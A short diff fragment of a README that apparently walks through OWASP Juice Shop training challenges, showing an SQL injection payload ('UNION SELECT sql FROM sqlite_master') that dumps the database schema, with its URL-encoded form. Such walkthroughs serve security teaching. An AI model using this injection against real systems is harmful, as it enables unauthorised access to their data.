genevievebrooks/OWASP-juice-shop-solutions/README.md

 SELECT * FROM Products WHERE ((name LIKE '%')) UNION SELECT sql FROM sqlite_master;--%' OR description LIKE '%<input>%') AND deletedAt IS NULL) ORDER BY name"
 ```
 Therefore, `q=')) UNION SELECT sql FROM sqlite_master;--`
-Make sure to URL encode the query before sending it as a request:
+Make sure to URL encode q before sending it as a request:
 ```
-'))%20UNION%20SELECT%20sql%20FROM%20sqlite_master;--
+q='))%20UNION%20SELECT%20sql%20FROM%20sqlite_master;--
 ```
 You should get this error in the response:
 ```